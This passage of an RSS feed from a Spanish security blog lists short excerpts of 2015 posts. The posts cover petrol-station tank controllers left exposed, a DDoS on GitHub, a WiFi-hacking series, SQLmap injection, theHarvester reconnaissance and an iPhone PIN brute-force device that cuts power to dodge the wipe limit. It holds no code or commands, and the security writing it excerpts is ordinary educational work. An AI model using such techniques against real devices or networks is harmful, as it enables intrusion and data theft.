&lt;p&gt;Ayer por la noche estaba leyendo un articulo de &lt;strong&gt;Amador Aparicio de la Fuente&lt;/strong&gt; en el que aseguraba que los conversores de serie a Ethernet del tipo &lt;strong&gt;GC-NET2 32-DTE&lt;/strong&gt; que &lt;strong&gt;utilizan las gasolineras españolas&lt;/strong&gt; para controlar los tanques de combustible &lt;strong&gt;eran vulnerables&lt;/strong&gt; (más que vulnerables, mala securización), nada más leer el artículo algo me decía que &lt;strong&gt;ya había leído&lt;/strong&gt; yo eso en algún sitio, hasta que recordé y ví el siguiente &lt;a href="https://x.com/cybergibbons/status/558551285776273408" target="_blank" rel="noopener noreferrer"&gt;tweet&lt;/a&gt;
, que en un principio no dí mucha importancia ni me dio por investigar.&lt;/p&gt;</description></item><item><title>China ataca GitHub introduciendo un troyano en Baidu</title><link>https://hackpuntes.com/es/posts/china-ataca-github-intruduciendo-un-troyano-en-baidu/</link><pubDate>Sat, 28 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/china-ataca-github-intruduciendo-un-troyano-en-baidu/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/china-ataca-github-intruduciendo-un-troyano-en-baidu/china-ataca-github-intruduciendo-un-troyano-en-baidu_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/china-ataca-github-intruduciendo-un-troyano-en-baidu/china-ataca-github-intruduciendo-un-troyano-en-baidu_banner.webp" alt="China ataca GitHub introduciendo un troyano en Baidu" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Seguro que muchos de los lectores de este blog, teniendo en cuenta cuál es su público más habitual, ya habrán notado que el funcionamiento de &lt;strong&gt;&lt;a href="https://github.com/" target="_blank" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;
&lt;/strong&gt; esta mañana ha sido intermitente.&lt;/p&gt;
&lt;p&gt;Como es habitual, este mal funcionamiento del servicio se debió a un nuevo ataque DDoS, como se puede comprobar en la &lt;strong&gt;&lt;a href="https://www.githubstatus.com/messages" target="_blank" rel="noopener noreferrer"&gt;página de estado&lt;/a&gt;
&lt;/strong&gt; de GitHub.&lt;/p&gt;
&lt;p&gt;Siendo los ataques a GitHub tan habituales, ¿por qué prestarle atención a este en concreto? Porque, en primer lugar, según la información disponible, este parece tener un atacante identificado con bastante probabilidad: el Gran Firewall chino. Sin embargo, tampoco es el primer ataque conocido con este origen: recordemos que, a principios de enero, el Gran Firewall hizo que el nombre de dominio de webs censuradas como Facebook resolviese a la dirección IP de la organización ciberactivista francesa La Quadrature du Net, provocando un volumen de tráfico para el que no estaban preparados y que &lt;strong&gt;&lt;a href="https://benjamin.sonntag.fr/en/2015/ddos-on-la-quadrature-du-net-analysis.html" target="_blank" rel="noopener noreferrer"&gt;provocó una denegación de servicio&lt;/a&gt;
&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>Hacking Wifi – Parte III – Instalación de Aircrack-ng</title><link>https://hackpuntes.com/es/posts/hacking-wifi-parte-iii-instalacion-de-aircrack-ng/</link><pubDate>Fri, 27 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hacking-wifi-parte-iii-instalacion-de-aircrack-ng/</guid><description>&lt;p&gt;En esta tercera parte, comenzaremos con la práctica, lo primero que haremos será &lt;strong&gt;instalar Aircrack-ng&lt;/strong&gt; y comprobar que ha sido correctamente instalado.&lt;/p&gt;
&lt;p&gt;Tengo que aclarar que Aircrack-ng &lt;strong&gt;NO es una sola herramienta&lt;/strong&gt;, es una &lt;strong&gt;suite&lt;/strong&gt; de software de seguridad inalámbrica, es decir, una recopilación de herramientas para auditar redes inalámbricas, esto debe de quedar claro porque utilizaremos varias herramientas de la suite de forma independiente, algunas de las herramientas más utilizadas son:&lt;/p&gt;</description></item><item><title>Hacking Wifi – Parte II – Requisitos antes de empezar</title><link>https://hackpuntes.com/es/posts/hacking-wifi-parte-ii-requisitos-antes-de-empezar/</link><pubDate>Wed, 25 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hacking-wifi-parte-ii-requisitos-antes-de-empezar/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hacking-wifi-parte-ii-requisitos-antes-de-empezar/hacking-wifi-parte-ii-requisitos-antes-de-empezar_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hacking-wifi-parte-ii-requisitos-antes-de-empezar/hacking-wifi-parte-ii-requisitos-antes-de-empezar_banner.webp" alt="Hacking Wifi – Parte II – Requisitos antes de empezar" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Antes de empezar&lt;/strong&gt; con estas entradas, aclararé que deberemos de probar nuestros ataques &lt;strong&gt;únicamente sobre redes propias&lt;/strong&gt;, la idea de estas entradas es para fines educativos y de aprendizaje, &lt;strong&gt;no me responsabilizo de un mal uso de ellas&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Acceder a una red Wi-Fi ajena&lt;/strong&gt; a la nuestra, se traduce jurídicamente en conectarse fraudulentamente a través de un sistema de conexión inalámbrico para evitar tener que soportar su coste y que lo asuma la empresa proveedora del servicio o bien un particular, algo que &lt;strong&gt;está penado&lt;/strong&gt; en los art. 255, 256 y 623.4 de nuestro Código Penal, en resumen estaréis cometiendo un &lt;strong&gt;delito&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>Examen Programación Hilos - HinchaGlobos y PinchaGlobos</title><link>https://hackpuntes.com/es/posts/examen-programacion-hilos-hinchaglobos-y-pinchaglobos/</link><pubDate>Fri, 20 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/examen-programacion-hilos-hinchaglobos-y-pinchaglobos/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/examen-programacion-hilos-hinchaglobos-y-pinchaglobos/examen-programacion-hilos-hinchaglobos-y-pinchaglobos_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/examen-programacion-hilos-hinchaglobos-y-pinchaglobos/examen-programacion-hilos-hinchaglobos-y-pinchaglobos_banner.webp" alt="Examen Programación Hilos - HinchaGlobos y PinchaGlobos" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Recientemente acabo de &lt;strong&gt;terminar mis exámenes&lt;/strong&gt; de programación, y en este caso me gustaría compartir con vosotros el examen de &lt;strong&gt;programación de servicios y procesos&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;El &lt;strong&gt;lenguaje de programación&lt;/strong&gt; que se ha utilizado para &lt;strong&gt;resolver&lt;/strong&gt; el ejercicio es &lt;strong&gt;Java&lt;/strong&gt;, y el examen decía lo siguiente (Dejo la nota de cada punto por si queréis intentarlo vosotros y calcular cual sería vuestra nota):&lt;/p&gt;</description></item><item><title>Hacking Wifi - Parte I - Introducción</title><link>https://hackpuntes.com/es/posts/hacking-wifi-parte-i-introduccion/</link><pubDate>Fri, 20 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hacking-wifi-parte-i-introduccion/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hacking-wifi-parte-i-introduccion/hacking-wifi-parte-i-introduccion_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hacking-wifi-parte-i-introduccion/hacking-wifi-parte-i-introduccion_banner.webp" alt="Hacking Wifi - Parte I - Introducción" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Bienvenido a la entrada de hoy, este será el primer post de una &lt;strong&gt;serie de entradas&lt;/strong&gt; que publicaré &lt;strong&gt;sobre Hacking Wifi&lt;/strong&gt;, existen en la red miles de artículos relacionados con este tema, pero casi todos son guías para que copies y pegues comandos en la terminal a &lt;strong&gt;diestro y siniestro&lt;/strong&gt; sin entender ni tener idea de que estas haciendo realmente y el motivo por el cual has mandado ese comando a la terminal.&lt;/p&gt;</description></item><item><title>IP-Box: Dispositivo para crackear claves de iPhone</title><link>https://hackpuntes.com/es/posts/ip-box-dispositivo-para-crackear-claves-de-iphone/</link><pubDate>Tue, 17 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/ip-box-dispositivo-para-crackear-claves-de-iphone/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/ip-box-dispositivo-para-crackear-claves-de-iphone/ip-box-dispositivo-para-crackear-claves-de-iphone_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/ip-box-dispositivo-para-crackear-claves-de-iphone/ip-box-dispositivo-para-crackear-claves-de-iphone_banner.webp" alt="IP-Box: Dispositivo para crackear claves de iPhone" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;IP-BOX permite por menos de 200€ obtener la contraseña de 4 dígitos de cualquier iPhone con iOS 8 o inferior.&lt;/p&gt;
&lt;p&gt;Realiza &lt;strong&gt;un ataque de fuerza bruta (efectivo en menos de 17 horas) y probablemente se aprovecha de la vulnerabilidad &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4451" target="_blank" rel="noopener noreferrer"&gt;CVE-2014-4451&lt;/a&gt;
&lt;/strong&gt; que afecta a todos los iOS anteriores a 8.1.1 que no controlan adecuadamente el límite de intentos de acceso.&lt;/p&gt;
&lt;p&gt;IP-BOX realiza de manera agresiva un corte de alimentación después de cada intento fallido, evitando así «Borrar datos después de 10 intentos«, aunque no garantiza que el dispositivo no sea «formateado» si tiene activado esta configuración.&lt;/p&gt;</description></item><item><title>Ataques SQL injection contra Bases de Datos mediante SQLmap</title><link>https://hackpuntes.com/es/posts/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap/</link><pubDate>Wed, 11 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap_banner.webp" alt="Ataques SQL injection contra Bases de Datos mediante SQLmap" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hoy en día, uno de los ataques que &lt;strong&gt;más se utiliza&lt;/strong&gt; contra aplicaciones web son los llamados &lt;strong&gt;SQL Injection,&lt;/strong&gt; estos ataques tienen como &lt;strong&gt;objetivo&lt;/strong&gt; acceder a la base de datos del sitio web, y &lt;strong&gt;obtener información sensible&lt;/strong&gt; sobre ella, como por ejemplo los &lt;strong&gt;datos para administrar el sitio web, contraseñas de los usuarios, correos electrónicos, DNI, dirección e incluso números de tarjetas de crédito con los códigos de verificación, etc.&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>Detectando aplicaciones maliciosas para Android en Google Play</title><link>https://hackpuntes.com/es/posts/detectando-aplicaciones-maliciosas-para-android-en-google-play/</link><pubDate>Wed, 11 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/detectando-aplicaciones-maliciosas-para-android-en-google-play/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/detectando-aplicaciones-maliciosas-para-android-en-google-play/detectando-aplicaciones-maliciosas-para-android-en-google-play_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/detectando-aplicaciones-maliciosas-para-android-en-google-play/detectando-aplicaciones-maliciosas-para-android-en-google-play_banner.webp" alt="Detectando aplicaciones maliciosas para Android en Google Play" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Una de las principales formas de prevenir una infección con malware en dispositivos con sistema operativo Android es no descargar e instalar aplicaciones que no sean de Google Play, es decir, no utilizar repositorios no oficiales, como solemos decir. Pero, ¿es esta medida suficiente?&lt;/p&gt;
&lt;p&gt;En el día de ayer estuvimos cubriendo la décima edición de &lt;a href="https://www.welivesecurity.com/la-es/tag/segurinfo/" target="_blank" rel="noopener noreferrer"&gt;SEGURINFO&lt;/a&gt;
2015 en Argentina, donde la exposición de cierre quedó en manos de un carismático disertante como es &lt;strong&gt;Chema Alonso&lt;/strong&gt;, con su presentación “Can I Play with madness?” (en honor a Iron Maiden). En ella abordó temas referidos a aplicaciones maliciosas dentro de Google Play, combinados con divertidas ironías que hicieron reír a la totalidad de la sala -tan colmada que hasta había gente sentada en el piso.&lt;/p&gt;</description></item><item><title>Obtener información con The Harvester</title><link>https://hackpuntes.com/es/posts/obtener-informacion-con-the-harvester/</link><pubDate>Mon, 09 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/obtener-informacion-con-the-harvester/</guid><description>&lt;p&gt;Antes de realizar cualquier intento de penetrar en un sistema informático, es necesario la &lt;strong&gt;recolección de información&lt;/strong&gt; sobre la empresa u organismo que se quiere penetrar o auditar, intentar cualquier ataque sin tener información sería &lt;strong&gt;«ir dando palos de ciego»&lt;/strong&gt; sin sentido, aunque parezca que es una pérdida de tiempo en un principio, durante la fase de explotación echaremos de menos no haber recolectado los suficientes datos.&lt;/p&gt;
&lt;p&gt;Siempre suelo utilizar una &lt;strong&gt;herramienta esencial, The Harvester.&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>Presentación de mi blog sobre Seguridad Informática y Hacking</title><link>https://hackpuntes.com/es/posts/blog-seguridad-informatica-hacking/</link><pubDate>Thu, 05 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/blog-seguridad-informatica-hacking/</guid><description>&lt;p&gt;Bienvenido a mi blog sobre &lt;strong&gt;Hacking, Seguridad Informática y Programación&lt;/strong&gt;, antes de nada, me presentaré, mi nombre es &lt;strong&gt;Javier Olmedo&lt;/strong&gt; y soy Técnico en Sistemas Informáticos y Técnico Superior en Desarrollo de Aplicaciones Multiplataforma, desde hace unos años aprendo seguridad informática de manera autodidacta.&lt;/p&gt;
&lt;h2 id="a-quién-va-dirigido-este-blog"&gt;¿A quién va dirigido este blog?&lt;/h2&gt;
&lt;p&gt;Este blog va dirigido a &lt;strong&gt;personas que deseen empezar&lt;/strong&gt; en el mundo del hacking y seguridad de sistemas informáticos, no pretendo hacer un blog demasiado técnico.&lt;/p&gt;</description></item></channel></rss>